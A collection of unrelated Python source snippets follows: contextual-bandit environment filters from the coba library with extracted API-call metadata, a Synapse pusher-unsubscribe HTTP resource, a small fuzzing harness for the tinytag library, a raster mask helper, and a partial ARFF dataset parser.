def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
iter_interactions = iter(interactions)
train_interactions = list(islice(iter_interactions,self._using))
test_interactions = chain.from_iterable([train_interactions, iter_interactions])
stats : Dict[Hashable,float] = defaultdict(int)
features: Dict[Hashable,List[Number]] = defaultdict(list)
for interaction in train_interactions:
for name,value in self._context_as_name_values(interaction.context):
if isinstance(value,Number) and not isnan(value):
features[name].append(value)
for feat_name, feat_numeric_values in features.items():
if self._stat == "mean":
stats[feat_name] = mean(feat_numeric_values)
if self._stat == "median":
stats[feat_name] = median(feat_numeric_values)
if self._stat == "mode":
stats[feat_name] = mode(feat_numeric_values)
for interaction in test_interactions:
kv_imputed_context = {}
for name,value in self._context_as_name_values(interaction.context):
kv_imputed_context[name] = stats[name] if isinstance(value,Number) and isnan(value) else value
if interaction.context is None:
final_context = None
elif isinstance(interaction.context,dict):
final_context = kv_imputed_context
elif isinstance(interaction.context,tuple):
final_context = tuple(kv_imputed_context[k] for k,_ in self._context_as_name_values(interaction.context))
else:
final_context = kv_imputed_context[1]
if isinstance(interaction, SimulatedInteraction):
yield SimulatedInteraction(
final_context,
interaction.actions,
interaction.rewards,
**interaction.kwargs
)
elif isinstance(interaction, LoggedInteraction):
yield LoggedInteraction(
final_context,
interaction.action,
interaction.reward,
**interaction.kwargs
)
else: #pragma: no cover
raise CobaException("Unknown interactions were given to Impute.")
def _context_as_name_values(self,context) -> Sequence[Tuple[Hashable,Any]]:
if isinstance(context,dict ): return context.items()
if isinstance(context,tuple): return enumerate(context)
if context is not None : return [(1,context)]
return []
class Sparse(EnvironmentFilter):
"""Sparsify an environment's feature representation.
This has little utility beyond debugging.
"""
def __init__(self, context:bool = True, action:bool = False):
"""Instantiate a Sparse filter.
Args:
context: If True then contexts should be made sparse otherwise leave them alone.
action: If True then actions should be made sparse otherwise leave them alone.
"""
self._context = context
self._action = action
@property
def params(self) -> Dict[str, Any]:
return { "sparse_C": self._context, "sparse_A": self._action }
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
for interaction in interactions:
sparse_context = self._make_sparse(interaction.context) if self._context else interaction.context
if isinstance(interaction, SimulatedInteraction):
sparse_actions = list(map(self._make_sparse,interaction.actions)) if self._action else interaction.actions
yield SimulatedInteraction(
sparse_context,
sparse_actions,
interaction.rewards
)
elif isinstance(interaction, LoggedInteraction):
sparse_action = self._make_sparse(interaction.action) if self._action else interaction.action
yield LoggedInteraction(
sparse_context,
sparse_action,
interaction.reward,
interaction.probability,
interaction.actions,
**interaction.kwargs
)
else: #pragma: no cover
raise CobaException("Unknown interactions were given to Sparse.")
def _make_sparse(self, value) -> Optional[dict]:
if isinstance(value,dict) or value is None:
return value
if isinstance(value,(list,tuple)):
return dict(enumerate(value))
return {0:value}
class Cycle(EnvironmentFilter):
"""Cycle all rewards associated with actions by one place.
This filter is useful for testing an algorithms response to a non-stationary shock.
"""
def __init__(self, after:int = 0):
"""Instantiate a Cycle filter.
Args:
after: How many interactions should be seen before applying the cycle filter.
"""
self._after = after
@property
def params(self) -> Dict[str, Any]:
return { "cycle_after": self._after }
def filter(self, interactions: Iterable[SimulatedInteraction]) -> Iterable[SimulatedInteraction]:
underlying_iterable = iter(interactions)
sans_cycle_interactions = islice(underlying_iterable, self._after)
with_cycle_interactions = underlying_iterable
for interaction in sans_cycle_interactions:
yield interaction
try:
first_interaction = next(with_cycle_interactions)
action_set = set(first_interaction.actions)
n_actions = len(action_set)
featureless_actions = [tuple([0]*n+[1]+[0]*(n_actions-n-1)) for n in range(n_actions)]
with_cycle_interactions = chain([first_interaction], with_cycle_interactions)
if len(set(action_set) & set(featureless_actions)) != len(action_set):
warnings.warn("Cycle only works for environments without action features. It will be ignored in this case.")
for interaction in with_cycle_interactions:
yield interaction
else:
for interaction in with_cycle_interactions:
rewards = interaction.rewards[-1:] + interaction.rewards[:-1]
yield SimulatedInteraction(interaction.context, interaction.actions, rewards, **interaction.kwargs)
except StopIteration:
pass
class Binary(EnvironmentFilter):
"""Binarize all rewards to either 1 (max rewards) or 0 (all others)."""
@property
def params(self) -> Dict[str, Any]:
return { "binary": True }
def filter(self, interactions: Iterable[SimulatedInteraction]) -> Iterable[SimulatedInteraction]:
for interaction in interactions:
max_rwd = max(interaction.rewards)
rewards = [int(r==max_rwd) for r in interaction.rewards]
yield SimulatedInteraction(interaction.context, interaction.actions, rewards, **interaction.kwargs)
class Sort(EnvironmentFilter):
"""Sort a sequence of Interactions in an Environment."""
def __init__(self, *keys: Union[str,int,Sequence[Union[str,int]]]) -> None:
"""Instantiate a Sort filter.
Args:
*keys: The context items that should be sorted on.
"""
self._keys = list(Flatten().filter([list(keys)]))[0]
@property
def params(self) -> Dict[str, Any]:
return { "sort": self._keys or '*' }
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
full_sorter = lambda interaction: tuple(interaction.context )
list_sorter = lambda interaction: tuple(interaction.context[key] for key in self._keys)
dict_sorter = lambda interaction: tuple(interaction.context.get(key,0) for key in self._keys)
interactions = list(interactions)
is_sparse = isinstance(interactions[0].context,dict)
sorter = full_sorter if not self._keys else dict_sorter if is_sparse else list_sorter
return sorted(interactions, key=sorter)
class Where(EnvironmentFilter):
"""Define Environment selection criteria for an Environments pipe."""
def __init__(self, *, n_interactions: Union[int,Tuple[Optional[int],Optional[int]]] = None) -> None:
"""Instantiate a Where filter.
Args:
n_interactions: The minimum, maximum or exact number of interactions Environments must have.
"""
self._n_interactions = n_interactions
@property
def params(self) -> Dict[str, Any]:
params = {}
if self._n_interactions is not None:
params["where_n_interactions"] = self._n_interactions
return params
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
interactions = iter(interactions)
if self._n_interactions is None or self._n_interactions == (None,None):
min_interactions = None
max_interactions = None
take_interactions = 0
elif isinstance(self._n_interactions, int):
min_interactions = self._n_interactions
max_interactions = self._n_interactions
take_interactions = self._n_interactions+1
else:
min_interactions = self._n_interactions[0]
max_interactions = self._n_interactions[1]
take_interactions = max(filter(lambda x: x is not None, list(self._n_interactions)))+1
taken_interactions = list(islice(interactions, take_interactions))
if max_interactions is not None and len(taken_interactions) > max_interactions:
return []
if min_interactions is not None and len(taken_interactions) < min_interactions:
return []
return chain(taken_interactions, interactions)
class Warm(EnvironmentFilter):
"""Turn a SimulatedEnvironment into a WarmStartEnvironment."""
def __init__(self, n_warm:int, seed:int = 1):
"""Instantiate a Warm filter.
Args:
n_warm: The number of interactions that should be turned into LoggedInteractions.
seed: The random number seed that determines the random logging policy for LoggedInteractions.
"""
self._n_warm = n_warm
self._seed = seed
@property
def params(self) -> Dict[str, Any]:
return { "n_warm": self._n_warm }
def filter(self, interactions: Iterable[SimulatedInteraction]) -> Iterable[Interaction]:
self._rng = CobaRandom(self._seed)
underlying_iterable = iter(interactions)
logged_interactions = map(self._to_logged_interaction, islice(underlying_iterable, self._n_warm))
simulated_interactions = underlying_iterable
return chain(logged_interactions, simulated_interactions)
def _to_logged_interaction(self, interaction: SimulatedInteraction) -> LoggedInteraction:
num_actions = len(interaction.actions)
probabilities = [1/num_actions] * num_actions
idx = self._rng.choice(list(range(num_actions)), probabilities)
actions = interaction.actions
action = interaction.actions[idx]
prob = probabilities[idx]
reward = interaction.rewards[idx]
return LoggedInteraction(interaction.context, action, reward, prob, actions)
class Riffle(EnvironmentFilter):
"""Riffle shuffle Interactions by taking actions from the end and evenly distributing into the beginning."""
def __init__(self, spacing: int = 3, seed=1) -> None:
"""Instantiate a Riffle filter.
Args:
spacing: The number of interactions from the beginning between each interaction shuffled in from the end.
seed: The seed used to determine the location of each ending interaction when placed within its beginning space.
"""
self._spacing = spacing
self._seed = seed
@property
def params(self) -> Dict[str, Any]:
return {"riffle_spacing": self._spacing, "riffle_seed": self._seed}
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
rng = CobaRandom(self._seed)
interactions = list(interactions)
for i in range(int(len(interactions)/(self._spacing+1))):
interactions.insert(i*self._spacing+rng.randint(0,self._spacing), interactions.pop())
return interactions
class Noise(EnvironmentFilter):
"""Introduce noise to an environment."""
def __init__(self,
context: Callable[[float,CobaRandom], float] = None,
action : Callable[[float,CobaRandom], float] = None,
reward : Callable[[float,CobaRandom], float] = None,
seed : int = 1) -> None:
"""Instantiate a Noise EnvironmentFilter.
Args:
context: A noise generator for context features.
action : A noise generator for action features.
reward : A noise generator for rewards.
seed : The seed initializing the random state of the noise generators.
"""
self._args = (context,action,reward,seed)
self._no_noise = lambda x, _: x
if context is None and action is None and reward is None:
context = lambda x, rng: x+rng.gauss(0,1)
self._context_noise = context or self._no_noise
self._action_noise = action or self._no_noise
self._reward_noise = reward or self._no_noise
self._seed = seed
def __reduce__(self) -> tuple:
try:
pickle.dumps(self._args)
except Exception:
message = (
"We were unable to pickle the Noise filter. This is likely due to using lambda functions for noise generation. "
"To work around this we recommend you first define your lambda functions as a named function and then pass the "
"named function to Noise."
)
raise CobaException(message)
else:
return (Noise, self._args)
@property
def params(self) -> Dict[str, Any]:
params = {}
if self._context_noise != self._no_noise: params['context_noise'] = True
if self._action_noise != self._no_noise : params['action_noise' ] = True
if self._reward_noise != self._no_noise : params['reward_noise' ] = True
params['noise_seed'] = self._seed
return params
def filter(self, interactions: Iterable[SimulatedInteraction]) -> Iterable[SimulatedInteraction]:
rng = CobaRandom(self._seed)
for interaction in interactions:
if isinstance(interaction, LoggedInteraction):
raise CobaException("We do not currently support adding noise to a LoggedInteraction.")
noisy_context = self._noises(interaction.context, rng, self._context_noise)
noisy_actions = [ self._noises(a, rng, self._action_noise) for a in interaction.actions ]
noisy_rewards = [ self._noises(r, rng, self._reward_noise) for r in interaction.rewards ]
yield SimulatedInteraction(noisy_context, noisy_actions, noisy_rewards, **interaction.kwargs)
def _noises(self, value:Union[None,float,str,Mapping,Sequence], rng: CobaRandom, noiser: Callable[[float,CobaRandom], float]):
if isinstance(value, collections.abc.Mapping):
#we sort so that noise generation is deterministic with respect to seed
return { k:self._noise(v, rng, noiser) for k,v in sorted(value.items()) }
if isinstance(value, collections.abc.Sequence) and not isinstance(value, str):
return [ self._noise(v, rng, noiser) for v in value ]
return self._noise(value, rng, noiser)
def _noise(self, value:Union[None,float,str], rng: CobaRandom, noiser: Callable[[float,CobaRandom], float]) -> float:
return value if not isinstance(value,(int,float)) else noiser(value, rng)
| [
"itertools.chain",
"coba.environments.logged.primitives.LoggedInteraction",
"itertools.islice",
"statistics.mean",
"statistics.stdev",
"coba.pipes.Flatten",
"pickle.dumps",
"coba.exceptions.CobaException",
"coba.statistics.iqr",
"statistics.median",
"itertools.chain.from_iterable",
"coba.environments.simulated.primitives.SimulatedInteraction",
"collections.defaultdict",
"statistics.mode",
"coba.random.CobaRandom",
"warnings.warn",
"math.isnan"
]
| [((3136, 3159), 'collections.defaultdict', 'defaultdict', (['(lambda : 0)'], {}), '(lambda : 0)\n', (3147, 3159), False, 'from collections import defaultdict\n'), ((3203, 3226), 'collections.defaultdict', 'defaultdict', (['(lambda : 1)'], {}), '(lambda : 1)\n', (3214, 3226), False, 'from collections import defaultdict\n'), ((3270, 3287), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3281, 3287), False, 'from collections import defaultdict\n'), ((6070, 6116), 'itertools.chain', 'chain', (['fitting_interactions', 'iter_interactions'], {}), '(fitting_interactions, iter_interactions)\n', (6075, 6116), False, 'from itertools import islice, chain\n'), ((9166, 9226), 'itertools.chain.from_iterable', 'chain.from_iterable', (['[train_interactions, iter_interactions]'], {}), '([train_interactions, iter_interactions])\n', (9185, 9226), False, 'from itertools import islice, chain\n'), ((9276, 9292), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (9287, 9292), False, 'from collections import defaultdict\n'), ((9341, 9358), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (9352, 9358), False, 'from collections import defaultdict\n'), ((14440, 14480), 'itertools.islice', 'islice', (['underlying_iterable', 'self._after'], {}), '(underlying_iterable, self._after)\n', (14446, 14480), False, 'from itertools import islice, chain\n'), ((19036, 19075), 'itertools.chain', 'chain', (['taken_interactions', 'interactions'], {}), '(taken_interactions, interactions)\n', (19041, 19075), False, 'from itertools import islice, chain\n'), ((19760, 19782), 'coba.random.CobaRandom', 'CobaRandom', (['self._seed'], {}), '(self._seed)\n', (19770, 19782), False, 'from coba.random import CobaRandom\n'), ((20014, 20064), 'itertools.chain', 'chain', (['logged_interactions', 'simulated_interactions'], {}), '(logged_interactions, simulated_interactions)\n', (20019, 20064), False, 'from itertools import islice, chain\n'), ((20517, 20586), 'coba.environments.logged.primitives.LoggedInteraction', 'LoggedInteraction', (['interaction.context', 'action', 'reward', 'prob', 'actions'], {}), '(interaction.context, action, reward, prob, actions)\n', (20534, 20586), False, 'from coba.environments.logged.primitives import LoggedInteraction\n'), ((21401, 21423), 'coba.random.CobaRandom', 'CobaRandom', (['self._seed'], {}), '(self._seed)\n', (21411, 21423), False, 'from coba.random import CobaRandom\n'), ((23780, 23802), 'coba.random.CobaRandom', 'CobaRandom', (['self._seed'], {}), '(self._seed)\n', (23790, 23802), False, 'from coba.random import CobaRandom\n'), ((3051, 3089), 'itertools.islice', 'islice', (['iter_interactions', 'self._using'], {}), '(iter_interactions, self._using)\n', (3057, 3089), False, 'from itertools import islice, chain\n'), ((3404, 3526), 'coba.exceptions.CobaException', 'CobaException', (['"""Shift is required to be 0 for sparse environments. Otherwise the environment will become dense."""'], {}), "(\n 'Shift is required to be 0 for sparse environments. Otherwise the environment will become dense.'\n )\n", (3417, 3526), False, 'from coba.exceptions import CobaException\n'), ((4584, 4673), 'warnings.warn', 'warnings.warn', (['f"""Some features were not scaled due to having mixed types: {mixed}. """'], {}), "(\n f'Some features were not scaled due to having mixed types: {mixed}. ')\n", (4597, 4673), False, 'import warnings\n'), ((9098, 9136), 'itertools.islice', 'islice', (['iter_interactions', 'self._using'], {}), '(iter_interactions, self._using)\n', (9104, 9136), False, 'from itertools import islice, chain\n'), ((14959, 15010), 'itertools.chain', 'chain', (['[first_interaction]', 'with_cycle_interactions'], {}), '([first_interaction], with_cycle_interactions)\n', (14964, 15010), False, 'from itertools import islice, chain\n'), ((18757, 18796), 'itertools.islice', 'islice', (['interactions', 'take_interactions'], {}), '(interactions, take_interactions)\n', (18763, 18796), False, 'from itertools import islice, chain\n'), ((19902, 19943), 'itertools.islice', 'islice', (['underlying_iterable', 'self._n_warm'], {}), '(underlying_iterable, self._n_warm)\n', (19908, 19943), False, 'from itertools import islice, chain\n'), ((22792, 22816), 'pickle.dumps', 'pickle.dumps', (['self._args'], {}), '(self._args)\n', (22804, 22816), False, 'import pickle\n'), ((5241, 5253), 'statistics.mean', 'mean', (['values'], {}), '(values)\n', (5245, 5253), False, 'from statistics import mean, median, stdev, mode\n'), ((5316, 5330), 'statistics.median', 'median', (['values'], {}), '(values)\n', (5322, 5330), False, 'from statistics import mean, median, stdev, mode\n'), ((5546, 5559), 'statistics.stdev', 'stdev', (['values'], {}), '(values)\n', (5551, 5559), False, 'from statistics import mean, median, stdev, mode\n'), ((5779, 5790), 'coba.statistics.iqr', 'iqr', (['values'], {}), '(values)\n', (5782, 5790), False, 'from coba.statistics import iqr\n'), ((9741, 9766), 'statistics.mean', 'mean', (['feat_numeric_values'], {}), '(feat_numeric_values)\n', (9745, 9766), False, 'from statistics import mean, median, stdev, mode\n'), ((9842, 9869), 'statistics.median', 'median', (['feat_numeric_values'], {}), '(feat_numeric_values)\n', (9848, 9869), False, 'from statistics import mean, median, stdev, mode\n'), ((9943, 9968), 'statistics.mode', 'mode', (['feat_numeric_values'], {}), '(feat_numeric_values)\n', (9947, 9968), False, 'from statistics import mean, median, stdev, mode\n'), ((15111, 15229), 'warnings.warn', 'warnings.warn', (['"""Cycle only works for environments without action features. It will be ignored in this case."""'], {}), "(\n 'Cycle only works for environments without action features. It will be ignored in this case.'\n )\n", (15124, 15229), False, 'import warnings\n'), ((16125, 16223), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['interaction.context', 'interaction.actions', 'rewards'], {}), '(interaction.context, interaction.actions, rewards, **\n interaction.kwargs)\n', (16145, 16223), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((23200, 23222), 'coba.exceptions.CobaException', 'CobaException', (['message'], {}), '(message)\n', (23213, 23222), False, 'from coba.exceptions import CobaException\n'), ((23927, 24013), 'coba.exceptions.CobaException', 'CobaException', (['"""We do not currently support adding noise to a LoggedInteraction."""'], {}), "(\n 'We do not currently support adding noise to a LoggedInteraction.')\n", (23940, 24013), False, 'from coba.exceptions import CobaException\n'), ((24321, 24413), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['noisy_context', 'noisy_actions', 'noisy_rewards'], {}), '(noisy_context, noisy_actions, noisy_rewards, **\n interaction.kwargs)\n', (24341, 24413), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((7292, 7412), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['final_context', 'interaction.actions', '(final_rewards or interaction.rewards)'], {}), '(final_context, interaction.actions, final_rewards or\n interaction.rewards, **interaction.kwargs)\n', (7312, 7412), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((7929, 7987), 'coba.exceptions.CobaException', 'CobaException', (['"""Unknown interactions were given to Scale."""'], {}), "('Unknown interactions were given to Scale.')\n", (7942, 7987), False, 'from coba.exceptions import CobaException\n'), ((10769, 10873), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['final_context', 'interaction.actions', 'interaction.rewards'], {}), '(final_context, interaction.actions, interaction.\n rewards, **interaction.kwargs)\n', (10789, 10873), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((11303, 11362), 'coba.exceptions.CobaException', 'CobaException', (['"""Unknown interactions were given to Impute."""'], {}), "('Unknown interactions were given to Impute.')\n", (11316, 11362), False, 'from coba.exceptions import CobaException\n'), ((12749, 12822), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['sparse_context', 'sparse_actions', 'interaction.rewards'], {}), '(sparse_context, sparse_actions, interaction.rewards)\n', (12769, 12822), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((13430, 13489), 'coba.exceptions.CobaException', 'CobaException', (['"""Unknown interactions were given to Sparse."""'], {}), "('Unknown interactions were given to Sparse.')\n", (13443, 13489), False, 'from coba.exceptions import CobaException\n'), ((3896, 3908), 'math.isnan', 'isnan', (['value'], {}), '(value)\n', (3901, 3908), False, 'from math import isnan\n'), ((7591, 7735), 'coba.environments.logged.primitives.LoggedInteraction', 'LoggedInteraction', (['final_context', 'interaction.action', 'interaction.reward', 'interaction.probability', 'interaction.actions'], {}), '(final_context, interaction.action, interaction.reward,\n interaction.probability, interaction.actions, **interaction.kwargs)\n', (7608, 7735), False, 'from coba.environments.logged.primitives import LoggedInteraction\n'), ((9540, 9552), 'math.isnan', 'isnan', (['value'], {}), '(value)\n', (9545, 9552), False, 'from math import isnan\n'), ((10222, 10234), 'math.isnan', 'isnan', (['value'], {}), '(value)\n', (10227, 10234), False, 'from math import isnan\n'), ((11051, 11150), 'coba.environments.logged.primitives.LoggedInteraction', 'LoggedInteraction', (['final_context', 'interaction.action', 'interaction.reward'], {}), '(final_context, interaction.action, interaction.reward, **\n interaction.kwargs)\n', (11068, 11150), False, 'from coba.environments.logged.primitives import LoggedInteraction\n'), ((13096, 13236), 'coba.environments.logged.primitives.LoggedInteraction', 'LoggedInteraction', (['sparse_context', 'sparse_action', 'interaction.reward', 'interaction.probability', 'interaction.actions'], {}), '(sparse_context, sparse_action, interaction.reward,\n interaction.probability, interaction.actions, **interaction.kwargs)\n', (13113, 13236), False, 'from coba.environments.logged.primitives import LoggedInteraction\n'), ((15504, 15602), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['interaction.context', 'interaction.actions', 'rewards'], {}), '(interaction.context, interaction.actions, rewards, **\n interaction.kwargs)\n', (15524, 15602), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((16548, 16557), 'coba.pipes.Flatten', 'Flatten', ([], {}), '()\n', (16555, 16557), False, 'from coba.pipes import Flatten\n')] |
from pythonfuzz.main import PythonFuzz
from tinytag import TinyTag
import io
@PythonFuzz
def fuzz(buf):
try:
f = open('temp.mp4', "wb")
f.write(buf)
f.seek(0)
tag = TinyTag.get(f.name)
except UnicodeDecodeError:
pass
if __name__ == '__main__':
fuzz()
| [
"tinytag.TinyTag.get"
]
| [((175, 194), 'tinytag.TinyTag.get', 'TinyTag.get', (['f.name'], {}), '(f.name)\n', (186, 194), False, 'from tinytag import TinyTag\n')] |
# Copyright 2022 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from synapse.api.errors import StoreError
from synapse.http.server import DirectServeHtmlResource, respond_with_html_bytes
from synapse.http.servlet import parse_string
from synapse.http.site import SynapseRequest
if TYPE_CHECKING:
from synapse.server import HomeServer
class UnsubscribeResource(DirectServeHtmlResource):
"""
To allow pusher to be delete by clicking a link (ie. GET request)
"""
SUCCESS_HTML = b"<html><body>You have been unsubscribed</body><html>"
def __init__(self, hs: "HomeServer"):
super().__init__()
self.notifier = hs.get_notifier()
self.auth = hs.get_auth()
self.pusher_pool = hs.get_pusherpool()
self.macaroon_generator = hs.get_macaroon_generator()
async def _async_render_GET(self, request: SynapseRequest) -> None:
token = parse_string(request, "access_token", required=True)
app_id = parse_string(request, "app_id", required=True)
pushkey = parse_string(request, "pushkey", required=True)
user_id = self.macaroon_generator.verify_delete_pusher_token(
token, app_id, pushkey
)
try:
await self.pusher_pool.remove_pusher(
app_id=app_id, pushkey=pushkey, user_id=user_id
)
except StoreError as se:
if se.code != 404:
# This is fine: they're already unsubscribed
raise
self.notifier.on_new_replication_data()
respond_with_html_bytes(
request,
200,
UnsubscribeResource.SUCCESS_HTML,
)
| [
"synapse.http.servlet.parse_string",
"synapse.http.server.respond_with_html_bytes"
]
| [((1465, 1517), 'synapse.http.servlet.parse_string', 'parse_string', (['request', '"""access_token"""'], {'required': '(True)'}), "(request, 'access_token', required=True)\n", (1477, 1517), False, 'from synapse.http.servlet import parse_string\n'), ((1535, 1581), 'synapse.http.servlet.parse_string', 'parse_string', (['request', '"""app_id"""'], {'required': '(True)'}), "(request, 'app_id', required=True)\n", (1547, 1581), False, 'from synapse.http.servlet import parse_string\n'), ((1600, 1647), 'synapse.http.servlet.parse_string', 'parse_string', (['request', '"""pushkey"""'], {'required': '(True)'}), "(request, 'pushkey', required=True)\n", (1612, 1647), False, 'from synapse.http.servlet import parse_string\n'), ((2111, 2182), 'synapse.http.server.respond_with_html_bytes', 'respond_with_html_bytes', (['request', '(200)', 'UnsubscribeResource.SUCCESS_HTML'], {}), '(request, 200, UnsubscribeResource.SUCCESS_HTML)\n', (2134, 2182), False, 'from synapse.http.server import DirectServeHtmlResource, respond_with_html_bytes\n')] |
# ******************************************************
## Copyright 2019, PBL Netherlands Environmental Assessment Agency and Utrecht University.
## Reuse permitted under Gnu Public License, GPL v3.
# ******************************************************
from netCDF4 import Dataset
import numpy as np
import general_path
import accuflux
import ascraster
import get_surrounding_cells
import make_np_grid
def do(mask_asc_fn, mask_id, dum_asc, logical = "EQ", mask_type='np_grid'):
dum_mask = ascraster.create_mask(mask_asc_fn, mask_id, logical = logical, numtype=int)
mask=[]
if mask_type=="rowcol":
for i in dum_mask:
mask.append(dum_asc.get_row_col_from_index(i))
elif mask_type=="index":
for i in dum_mask:
mask.append(i)
elif mask_type=="latlon":
for i in dum_mask:
mask.append(dum_asc.get_coord_from_index(i))
elif mask_type=="np_grid":
mask = np.zeros((dum_asc.nrows, dum_asc.ncols), dtype=bool)
mask[:,:] = True
for i in dum_mask:
row, col = dum_asc.get_row_col_from_index(i)
mask[row,col]=False
return mask
| [
"ascraster.create_mask",
"numpy.zeros"
]
| [((503, 576), 'ascraster.create_mask', 'ascraster.create_mask', (['mask_asc_fn', 'mask_id'], {'logical': 'logical', 'numtype': 'int'}), '(mask_asc_fn, mask_id, logical=logical, numtype=int)\n', (524, 576), False, 'import ascraster\n'), ((930, 982), 'numpy.zeros', 'np.zeros', (['(dum_asc.nrows, dum_asc.ncols)'], {'dtype': 'bool'}), '((dum_asc.nrows, dum_asc.ncols), dtype=bool)\n', (938, 982), True, 'import numpy as np\n')] |
from io import TextIOWrapper
import math
from typing import TypeVar
import random
import os
from Settings import Settings
class Dataset:
DataT = TypeVar('DataT')
WIN_NL = "\r\n"
LINUX_NL = "\n"
def __init__(self, path:str, filename:str, newline:str = WIN_NL) -> None:
self.path_ = path
self.filename_ = filename
self.loaded_ = False
self.parsed_ = False
self.data_ = None
self.nl = newline
self.classes_ = set()
self.attributes_ = []
self.types_ = []
self.data_ = []
def Data(self) -> list:
return self.data_
def Attributes(self) -> list:
return self.attributes_
def Types(self) -> list:
return self.types_
def Classes(self) -> list:
return self.classes_
def Load(self, reload:bool = False) -> DataT:
if not self.loaded_ or reload:
self.file_ = open(os.sep.join([self.path_, self.filename_]))
self.loaded_ = True
# If we reload, then we want to reparse as well.
return self.Parse_(reload)
def Parse_(self, reparse:bool = False) -> DataT:
if not self.loaded_:
# Silently return instead of raising an exception because
# this method is not intended to be used outside of the
# class. Although, it can be used that way if needed.
return
if not self.parsed_ or reparse:
self.Parse_Hook_(self.file_.read())
return self.data_
def Parse_Hook_(self, data:str) -> None:
self.data_ = data
def __del__(self):
if self.loaded_:
self.file_.close()
class ArffRow:
ATTR_LABEL = '@ATTRIBUTE ' # need the space at the end here
DATA_LABEL = '@DATA'
ATTR_LEN = len(ATTR_LABEL)
DATA_LEN = len(DATA_LABEL)
Attributes = []
Types = []
Data = []
Classes = set()
IsCollecting_ = False
@classmethod
def Reset(cls):
cls.Attributes = []
cls.Types = []
cls.Data = []
cls.Classes = set()
cls.IsCollecting_ = False
def __init__(self, line:str, nl:str) -> None:
self.line_ = line
self.len_ = len(line)
self.nl_ = nl
def Len(self) -> str:
return self.len_
def HasAttributeLabel(self) -> bool:
return self.len_ >= ArffRow.ATTR_LEN and self.line_[0:ArffRow.ATTR_LEN] == ArffRow.ATTR_LABEL
def HasDataLabel(self) -> bool:
return self.len_ >= ArffRow.DATA_LEN and self.line_[0:ArffRow.DATA_LEN] == ArffRow.DATA_LABEL
def GetAttributeData(self) -> tuple[str, str]:
namePosition = 0
for (i, char) in enumerate(self.line_[ArffRow.ATTR_LEN:]):
if char == '\t':
namePosition = i + ArffRow.ATTR_LEN
break
return (self.line_[ArffRow.ATTR_LEN:namePosition], self.line_[namePosition + 1:])
def Parse(self):
if ArffRow.IsCollecting_ and self.len_ > 1:
ArffRow.Data.append(self.line_.split(','))
ArffRow.Classes.add(ArffRow.Data[-1][-1])
elif self.HasDataLabel():
ArffRow.IsCollecting_ = True
elif self.HasAttributeLabel():
attrData = self.GetAttributeData()
ArffRow.Attributes.append(attrData[0])
ArffRow.Types.append(attrData[1])
class ArffDataset(Dataset):
# ARFF (Attribute-Relation File Format)
#def __init__(self, path:str, filename:str, newline:str = Dataset.WIN_NL) -> None:
# super().__init__(path, filename, newline)
#
# self.parser_ = {
# 'attributesLoaded': False,
# }
def Parse_Hook_(self, data:str) -> None:
ArffRow.Reset()
rows = [ArffRow(line, self.nl) for line in data.split(self.nl)]
for row in rows:
row.Parse()
for attribute in ArffRow.Attributes:
self.attributes_.append(attribute)
for typeName in ArffRow.Types:
self.types_.append(typeName)
for datum in ArffRow.Data:
self.data_.append(datum)
self.classes_ = self.classes_.union(ArffRow.Classes)
classes = list(self.classes_)
attribute_maxes = {}
for row in self.data_:
classIndex = classes.index(row[-1])
row[-1] = [1 if i == classIndex else 0 for (i, value) in enumerate(classes)]
for i in range(len(row)):
if self.types_[i] == 'REAL':
row[i] = float(row[i])
elif self.types_[i] == 'INTEGER':
row[i] = int(row[i])
else:
continue
if i not in attribute_maxes:
attribute_maxes[i] = 0
if abs(row[i]) > attribute_maxes[i]:
attribute_maxes[i] = row[i]
for i in range(len(row)):
if self.types_[i] == 'REAL' or self.types_[i] == 'INTEGER':
row[i] = row[i] / attribute_maxes[i]
self.data_ = self.RowSort(self.data_)
def LexOrder(self, item1, item2):
num_fields = len(item1)
for i in range(num_fields):
if item1[i] != item2[i]:
if item1[i] < item2[i]:
return -1
else:
return 1
return 0
def RowSort(self, rows):
rows_len = len(rows)
if rows_len > 2:
result1 = self.RowSort(rows[0: math.floor(rows_len * 0.5)])
result2 = self.RowSort(rows[math.floor(rows_len * 0.5):])
sorted_rows = []
item1 = None
item2 = None
while len(result1) > 0 or len(result2) > 0:
if len(result1) > 0 and len(result2) > 0 and item1 == None and item2 == None:
item1 = result1.pop(0)
item2 = result2.pop(0)
elif len(result1) > 0 and item1 == None:
item1 = result1.pop(0)
elif len(result2) > 0 and item2 == None:
item2 = result2.pop(0)
order = 0
if item1 == None and item2 != None:
order = 1
elif item1 != None and item2 == None:
order = -1
else:
order = self.LexOrder(item1, item2)
if order == -1:
sorted_rows.append(item1)
item1 = None
elif order == 1:
sorted_rows.append(item2)
item2 = None
else:
sorted_rows.append(item1)
sorted_rows.append(item2)
item1 = None
item2 = None
if item1 != None:
sorted_rows.append(item1)
if item2 != None:
sorted_rows.append(item2)
return sorted_rows
elif rows_len == 1:
return rows
else:
